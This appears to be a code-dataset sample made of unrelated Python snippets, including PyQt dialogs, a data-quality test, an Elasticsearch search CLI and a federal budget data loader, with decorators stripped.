self.btnClear.clicked.connect(self.clearUi)
self.clearUi()
self.flushCmb()
self.listModule.itemClicked.connect(self.ModuleItemClick)
self.txtModule.textChanged.connect(self.changeModule)
self.cmbPackage.currentTextChanged.connect(self.changePackage)
self.modules = None
def initData(self):
self.listModule.clear()
for item in self.modules:
self.listModule.addItem(item)
def flushCmb(self):
self.cmbPackage.clear()
files = os.listdir('./tmp/')
self.cmbPackage.addItem('tmp data')
for item in files:
if ('.modules.txt' in item):
self.cmbPackage.addItem(item.replace('.modules.txt', ''))
def ModuleItemClick(self, item):
self.txtModule.setText(item.text())
def changeModule(self, data):
if ((self.modules == None) or (len(self.modules) <= 0)):
return
if ((data == '') or (data == 'tmp data')):
return
self.listModule.clear()
if (len(data) > 0):
for item in self.modules:
if (data in item):
self.listModule.addItem(item)
else:
for item in self.modules:
self.listModule.addItem(item)
def changePackage(self, data):
if ((data == '') or (data == 'tmp data')):
return
filepath = (('./tmp/' + data) + '.modules.txt')
with open(filepath, 'r', encoding='utf-8') as packageFile:
res = packageFile.read()
self.modules = res.split('\n')
self.initData()
def clearUi(self):
self.txtSymbol.setText('')
self.txtOffset.setText('')
self.txtModule.setText('')
def submit(self):
moduleName = self.txtModule.text()
offset = self.txtOffset.text()
symbol = self.txtSymbol.text()
if (len(moduleName) <= 0):
QMessageBox().information(self, 'hint', 'missing module')
return
if ((len(offset) <= 0) and (len(symbol) <= 0)):
QMessageBox().information(self, 'hint', 'must enter offset or symbol')
return
self.moduleName = moduleName
self.offset = offset
self.symbol = symbol
self.accept() |
def _on_monitor_change(**kwargs):
fieldname = kwargs['fieldname']
obj = kwargs['obj']
name = kwargs['name']
session = kwargs['session']
outputfunc_name = kwargs['outputfunc_name']
category = None
if (hasattr(obj, 'db_category') and (obj.db_category != None)):
category = obj.db_category
fieldname = fieldname.replace('[{}]'.format(obj.db_category), '')
if session:
callsign = {outputfunc_name: {'name': name, **({'category': category} if (category is not None) else {}), 'value': _GA(obj, fieldname)}}
session.msg(**callsign) |
class TestCategoryShare(BaseDataQualityCategoryMetricsTest):
name: ClassVar = 'Share of category'
alias: ClassVar = 'share_category'
def get_condition_from_reference(self, reference: Optional[CategoryStat]) -> float:
if (reference is not None):
return reference.category_ratio
raise ValueError('Neither required test parameters nor reference data has been provided.')
def calculate_value_for_test(self) -> Numeric:
return self.metric.get_result().current.category_ratio
def get_description(self, value: Numeric) -> str:
metric_result = self.metric.get_result()
return f"The share of category '{metric_result.category}' in the column **{self.column_name.display_name}** is {value:.3g} ({metric_result.current.category_num} out of {metric_result.current.all_num}). The test threshold is {self.get_condition()}."
def get_parameters(self) -> CheckValueParameters:
return ValueListParameters(condition=self.get_condition(), value=self._value, category=self.category) |
(scope='package')
def pysoa_client_json():
config = copy.deepcopy(_base_config)
config['echo']['transport']['kwargs']['default_serializer_config'] = _json_serializer
config['meta']['transport']['kwargs']['default_serializer_config'] = _json_serializer
config['user']['transport']['kwargs']['default_serializer_config'] = _json_serializer
return Client(config=config, expansion_config=_expansion_config) |
class SizedArrayDecoder(BaseArrayDecoder):
array_size = None
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.is_dynamic = self.item_decoder.is_dynamic
_tuple
def decode(self, stream):
for _ in range(self.array_size):
(yield self.item_decoder(stream)) |
_group.command('event-search')
('query')
('--index', '-i', multiple=True, help='Index patterns to search against')
('--eql/--lucene', '-e/-l', 'language', default=None, help='Query language used (default: kql)')
('--date-range', '-d', type=(str, str), default=('now-7d', 'now'), help='Date range to scope search')
('--count', '-c', is_flag=True, help='Return count of results only')
('--max-results', '-m', type=click.IntRange(1, 1000), default=100, help='Max results to return (capped at 1000)')
('--verbose', '-v', is_flag=True, default=True)
_client('elasticsearch')
def event_search(query, index, language, date_range, count, max_results, verbose=True, elasticsearch_client: Elasticsearch=None):
(start_time, end_time) = date_range
index = (index or ('*',))
language_used = ('kql' if (language is None) else ('eql' if (language is True) else 'lucene'))
collector = CollectEvents(elasticsearch_client, max_results)
if verbose:
click.echo(f"searching {','.join(index)} from {start_time} to {end_time}")
click.echo(f'{language_used}: {query}')
if count:
results = collector.count(query, language_used, index, start_time, end_time)
click.echo(f'total results: {results}')
else:
results = collector.search(query, language_used, index, start_time, end_time, max_results)
click.echo(f'total results: {len(results)} (capped at {max_results})')
click.echo_via_pager(json.dumps(results, indent=2, sort_keys=True))
return results |
class OptionSeriesBoxplotSonificationDefaultinstrumentoptionsMappingTremoloSpeed(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class StalkerSceneAddAllShotPrevisOutputsOperator(bpy.types.Operator):
bl_label = 'Add All Shot Previs Outputs'
bl_idname = 'stalker.scene_add_all_shot_previs_outputs_op'
stalker_entity_id = bpy.props.IntProperty(name='stalker_entity_id')
stalker_entity_name = bpy.props.StringProperty(name='stalker_entity_name')
def execute(self, context):
logger.debug(('inside %s.execute()' % self.__class__.__name__))
scene = Task.query.get(self.stalker_entity_id)
logger.debug(('scene: %s' % scene))
return set(['FINISHED']) |
class Command(BaseCommand):
help = 'Loads historical budget authority data from a CSV'
DEFAULT_DIRECTORY_PATH = os.path.join('usaspending_api', 'data', 'budget_authority')
def add_arguments(self, parser):
parser.add_argument('-q', '--quarter', type=valid_quarter, help='Quarter to load from spreadsheets in data/budget_authority/quarterly')
parser.add_argument('-d', '--directory', default=self.DEFAULT_DIRECTORY_PATH, help='Directory containing broker_rules_fr_entity.xlsx, budget_authority.csv, and quarterly/ directory')
def load_frec_map(self):
frec_map_path = os.path.join(self.directory, 'broker_rules_fr_entity.xlsx')
workbook = open_workbook(frec_map_path)
sheet = list(workbook.sheets())[1]
headers = [cell.value for cell in sheet.row(3)]
FrecMap.objects.all().delete()
instances = []
for i in range(4, sheet.nrows):
row = dict(zip(headers, (cell.value for cell in sheet.row(i))))
logger.info('Load FREC Map: AID {} / MAC {} / TAS {}'.format(row['AID'], row['MAIN'], row['GWA_TAS_NAME']))
instance = FrecMap(agency_identifier=row['AID'], main_account_code=row['MAIN'], treasury_appropriation_account_title=row['GWA_TAS_NAME'], sub_function_code=row['Sub Function Code'], fr_entity_code=row['FR Entity Type'])
instances.append(instance)
logger.info('Running bulk create across FREC map...')
FrecMap.objects.bulk_create(instances)
def load_quarterly_spreadsheets(self, quarter, results, overall_totals):
quarterly_path = os.path.join(self.directory, 'quarterly', '*.xls')
this_fy = fy(date.today())
overall_totals[this_fy] = 0
amount_column = 'Q{}_AMT'.format(quarter)
for filename in glob.glob(quarterly_path):
workbook = open_workbook(filename)
sheet = list(workbook.sheets())[0]
headers = [cell.value for cell in sheet.row(0)]
for i in range(1, sheet.nrows):
row = dict(zip(headers, (cell.value for cell in sheet.row(i))))
if (row['LNO'] == '2500'):
dollars = (int(row[amount_column]) * 1000)
results[(row['TRAG'], None, this_fy)] = dollars
overall_totals[this_fy] += dollars
def find_frec(self, agency_identifier, row):
frec_inst = FrecMap.objects.filter(agency_identifier=agency_identifier, main_account_code=row['Account Code'], sub_function_code=row['Subfunction Code'])
if frec_inst.exists():
return frec_inst.first().fr_entity_code
def handle(self, *args, **options):
self.directory = options['directory']
self.load_frec_map()
historical_path = os.path.join(self.directory, 'budget_authority.csv')
overall_totals = defaultdict(int)
results = defaultdict(int)
with open(historical_path) as infile:
BudgetAuthority.objects.all().delete()
results = defaultdict(int)
reader = csv.DictReader(infile)
for row in reader:
agency_identifier = row['Treasury Agency Code'].zfill(3)
logger.info('Loading agency identifier from file: {}'.format(agency_identifier))
frec_inst = FrecMap.objects.filter(agency_identifier=agency_identifier, main_account_code=row['Account Code'], sub_function_code=row['Subfunction Code'])
if frec_inst.exists():
frec = frec_inst.first()
else:
frec = None
frec = self.find_frec(agency_identifier, row)
for year in range(1976, 2023):
amount = row[str(year)]
amount = (int(amount.replace(',', '')) * 1000)
results[(agency_identifier, frec, year)] += amount
overall_totals[year] += amount
quarter = options['quarter']
if quarter:
self.load_quarterly_spreadsheets(options['quarter'], results, overall_totals)
else:
logger.info('No quarter given. Quarterly spreadsheets not loaded.')
logger.info('Running bulk create across agencies...')
BudgetAuthority.objects.bulk_create((BudgetAuthority(agency_identifier=agency_identifier, fr_entity_code=frec, year=year, amount=amount) for ((agency_identifier, frec, year), amount) in results.items()))
logger.info('Running bulk create across totals...')
OverallTotals.objects.bulk_create((OverallTotals(fiscal_year=year, total_budget_authority=amount) for (year, amount) in overall_totals.items())) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.